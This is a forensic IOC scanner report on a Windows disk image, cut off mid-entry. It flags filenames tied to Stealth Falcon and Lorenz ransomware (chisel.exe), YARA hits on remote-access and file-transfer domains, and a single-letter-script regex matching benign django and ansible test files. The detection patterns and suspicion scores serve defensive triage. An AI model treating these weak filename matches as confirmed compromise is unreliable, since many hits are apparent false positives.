529b4fb350413330002a25bd78b2da01b07e4000 / ROPA30*%x~@
CREATED:
Mon Jul 22 15:15:50.535 2024
MODIFIED:
Sun Jun 2 22:58:07.000 2024
ACCESSED:
Tue Jul 23 13:03:53.046 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Warning 55
Sep 10 13:08:40 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Possibly Dangerous file found
SCORE:
80
FILE:
E:\Windows\WinSxS\amd64_userexperience-desktop_31bf3856ad364e35_10.0.22621.4036_none_0c696635e5be7038\n\CBS\WindowsBackup.dll
EXT:
.dll
TYPE:
UNKNOWN
SIZE:
573243
FIRSTBYTES:
03c057b150413330808e3c731cd5da01b07e4000 / WPA30<s~@
CREATED:
Tue Aug 13 19:52:49.833 2024
MODIFIED:
Sat Jul 13 23:56:46.000 2024
ACCESSED:
Tue Aug 13 19:55:34.134 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:R / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:R / NT SERVICE\TrustedInstaller:F
OWNER:
NT SERVICE\TrustedInstaller
REASON_1:
Filename IOC \WindowsBackup.dll
SUBSCORE_1:
80
REF_1:
Stealth Falcon Filename IOC https://www.welivesecurity.com/2019/09/09/backdoor-stealth-falcon-group/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Warning 56
Sep 10 13:11:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
RegistryHive
MESSAGE:
Suspicious registry hive entries found
ENTRY:
{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;ProgramId;000686e3c383522ce70132c9963a47de5fa00000ffff[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;FileId;000012527700408fd8e700ef290bb230a88f63fd56c1[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;LowerCaseLongPath;c:\windows\syswow64\chisel.exe[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Name;chisel.exe[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;BinaryType;pe64_amd64[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;LinkDate;01/01/1970 00:00:00[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Size;9006080[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Language;0[...]{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995;Usn;926634472
SCORE:
75
PATH:
E:\Windows\appcompat\Programs\Amcache.hve
KEY:
{9d33ac1a-dc78-01f4-fc46-c5a414a127ab}\Root\InventoryApplicationFile\chisel.exe|2cbc2438f8a1e995
MODIFIED:
Tue Sep 3 09:38:51 2024
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
c:\windows\syswow64\chisel.exe
EXISTS_1:
no
FILE_2:
E:\Windows\appcompat\Programs\Amcache.hve
EXISTS_2:
yes
TYPE_2:
Registry Hive
SIZE_2:
2097152
FIRSTBYTES_2:
726567663f0200003e020000eb413c7e27b6da01 / regf?>A<~'
CREATED_2:
Tue Jun 4 02:32:49.870 2024
OWNER_2:
NT AUTHORITY\SYSTEM
Warning 57
Sep 10 13:11:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Amcache
MESSAGE:
Suspicious Amcache entry found
ELEMENT:
FILE: c:\windows\syswow64\chisel.exe SHA1: 12527700408fd8e700ef290bb230a88f63fd56c1 SIZE: 9006080 DESCRIPTION: PRODUCT: COMPANY:
SCORE:
75
FILE:
c:\windows\syswow64\chisel.exe
SIZE:
9006080
DESCRIPTION:
FIRST_RUN:
Tue Sep 3 09:38:51 2024
CREATED:
Thu Jan 1 00:00:00 1970
PRODUCT:
COMPANY:
FILE_EXISTS:
no
REASON_1:
Filename IOC \chisel.exe
SUBSCORE_1:
75
REF_1:
Lorenz Ransomware IOCs https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
c:\windows\syswow64\chisel.exe
EXISTS_1:
no
Notices
Notice 1
Sep 10 12:20:57 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Program Files (x86)\virtio\monitor\vm-agent-daemon.exe
EXT:
.exe
TYPE:
EXE
SIZE:
136704
FIRSTBYTES:
4d5a90000300000004000000ffff0000b8000000 / MZ
CREATED:
Wed May 8 17:05:10.000 2019
MODIFIED:
Wed May 8 17:05:10.000 2019
ACCESSED:
Tue Sep 3 13:11:26.649 2024
PERMISSIONS:
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:R / APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:R / BUILTIN\Administrators:F / BUILTIN\Users:R / NT AUTHORITY\SYSTEM:F
OWNER:
NT AUTHORITY\SYSTEM
IMPHASH:
2d74ef92f75a2cb8b74d1bf89f0c23d4
REASON_1:
YARA rule EXE_Susp_Cmds / Detects suspicious Windows command line commands in Executables
SUBSCORE_1:
40
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2017-11-11
TAGS_1:
EXE, FILE, HIGHVOL, SUSP, T1053_005, T1087_001, T1562_001
RULENAME_1: EXE_Susp_Cmds
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
Notice 2
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"cdn.discordapp.com": "{\"Tier1\": [6061, 8741], \"Tier2\": [3127, 7462, 1141, 3604]}",
SCORE:
40
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule KEYWORD_NOTICE_Domain_File_Transfer_Service_Aug23 / Detects potentially suspicious domains of file transfer services which might be used by attackers for data exfiltration or hosting of malware
SUBSCORE_1:
40
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULEDATE_1:
2023-08-30
TAGS_1:
KEYWORD, T1020, T1569_002
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
Notice 3
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"launch.getgo.com": "{\"Tier1\": [983, 6061], \"Tier2\": [1125, 8469, 9598]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_getgo_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_getgo_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
Notice 4
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"secure.logmein.com": "{\"Tier1\": [6061, 5938, 214], \"Tier2\": [7816, 8469, 4426, 236]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_logmein_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_logmein_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
Notice 5
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"secure.logmeinrescue.com": "{\"Tier1\": [6061, 5938], \"Tier2\": [7354, 2349, 8997, 7539, 3006, 9121]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_secure_logmeinrescue_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_secure_logmeinrescue_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
Notice 6
Sep 10 12:22:39 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
"www.logmein.com": "{\"Tier1\": [214, 6061, 5938], \"Tier2\": [8469, 4426, 236]}",
SCORE:
50
FILE:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
LOG_MODIFIED:
Mon Jun 3 20:12:06 2024
LOG_ACCESSED:
Mon Jun 3 20:12:06 2024
LOG_CREATED:
Mon Jun 3 20:12:06 2024
REASON_1:
YARA rule yara_c2_logmein_com / Suspicious Domain Name / FQDN used by Remote Access Software 2023-09-16 https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md (SUSPICIOUS, REMOTE_CONTROL)
SUBSCORE_1:
50
REF_1:
not set
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
RULENAME_1: yara_c2_logmein_com
AUTHOR_1:
unknown
REASONS_COUNT:
1
FILE_1:
E:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000004.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
1107526
FIRSTBYTES_1:
6274fa967d01010c000000000000000200000001 / bt}
CREATED_1:
Mon Jun 3 20:12:06.181 2024
Notice 7
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.293 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
Notice 8
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.307 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\PULL_REQUEST_TEMPLATE\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
Notice 9
Sep 10 12:27:01 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
Sep 03 10:42:45.361 INFO Get file handle: "C:\\Users\\j-taylor\\AppData\\Local\\Programs\\Microsoft VS Code\\resources\\app\\extensions\\github\\testWorkspace\\docs\\PULL_REQUEST_TEMPLATE\\x.txt" (attempt 1)
SCORE:
40
FILE:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
LOG_MODIFIED:
Tue Sep 3 10:42:45 2024
LOG_ACCESSED:
Tue Sep 3 10:42:45 2024
LOG_CREATED:
Tue Sep 3 10:42:44 2024
REASON_1:
Filename IOC \x.txt
SUBSCORE_1:
40
REF_1:
BSI CSW-Nr. 2017-200525-1034
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
FILE_1:
E:\Users\j-taylor\AppData\Local\Temp\vscode-inno-updater-1725360164.log
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
238926
FIRSTBYTES_1:
5365702030332031303a34323a34342e36373320 / Sep 03 10:42:44.673
CREATED_1:
Tue Sep 3 10:42:44.668 2024
Notice 10
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 11
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\b.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 12
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\d.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 13
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\e.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 14
Sep 10 12:27:42 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\forms_tests\field_tests\filepathfield_test_dir\c\f\g.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
0
FIRSTBYTES:
/
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 15
Sep 10 12:27:45 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip\django-main\tests\migrations\test_migrations_clashing_prefix\a.py
EXT:
.py
TYPE:
UNKNOWN
SIZE:
83
FIRSTBYTES:
66726f6d20646a616e676f2e646220696d706f72 / from django.db impor
MODIFIED:
Mon Jul 29 10:31:32.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\Dev Rep\django-main.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
15363470
ARCHIVE_MD5: 36f7c9edd23803cacc0096fd1abebd0d
ARCHIVE_SHA1: 48d7e642c57d625f72e05c062a4ed7fd38f4bb20
ARCHIVE_FIRSTBYTES:
504b03040a0000000000f01bfd58000000000000 / PK X
ARCHIVE_CREATED:
Mon Jul 29 01:18:34.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:37.164 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 16
Sep 10 12:28:49 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\.azure-pipelines\commands\i.sh
EXT:
.sh
TYPE:
UNIX SCRIPT
SIZE:
393
FIRSTBYTES:
23212f7573722f62696e2f656e7620626173680a / #!/usr/bin/env bash
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 17
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\lib_with_extension\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
180
FIRSTBYTES:
23212f7573722f62696e2f707974686f6e0a6672 / #!/usr/bin/python fr
MODIFIED:
Mon Jul 29 08:41:23.000 2024
PERMISSIONS:
ARCHIVE_FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip
ARCHIVE_TYPE:
ZIP
ARCHIVE_SIZE:
5491432
ARCHIVE_MD5: 7fdbf84c4fc030083bd41e484e4efaf1
ARCHIVE_SHA1: 47f210fe5617b2f79255f38c32bc51aef0e3b932
ARCHIVE_FIRSTBYTES:
504b03040a00000000002b0dfd58000000000000 / PK +X
ARCHIVE_CREATED:
Mon Jul 29 01:24:54.000 2024
ARCHIVE_MODIFIED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_ACCESSED:
Tue Jul 30 12:59:38.321 2024
ARCHIVE_PERMISSIONS:
BUILTIN\Administrators:F / NT AUTHORITY\SYSTEM:F
REASON_1:
Filename IOC \\[\w]\.(sh|ps1|py|bat)$
SUBSCORE_1:
40
REF_1:
Suspicious Single Letter Script Names
SIGTYPE_1:
internal
SIGCLASS_1:
Filename IOC
MATCHED_1
REASONS_COUNT:
1
Notice 18
Sep 10 12:28:59 WIN-LRTT94FA08M/10.100.5.12
MODULE:
Filescan
MESSAGE:
Suspicious file found
SCORE:
40
FILE:
E:\Users\j-taylor\Desktop\ПО\ПО\DevOps Rep\ansible-devel.zip\ansible-devel\test\integration\targets\module_precedence\roles_with_extension\foo\library\a.py
EXT:
.py
TYPE:
UNIX SCRIPT
SIZE:
191
FIRSTBYTES:
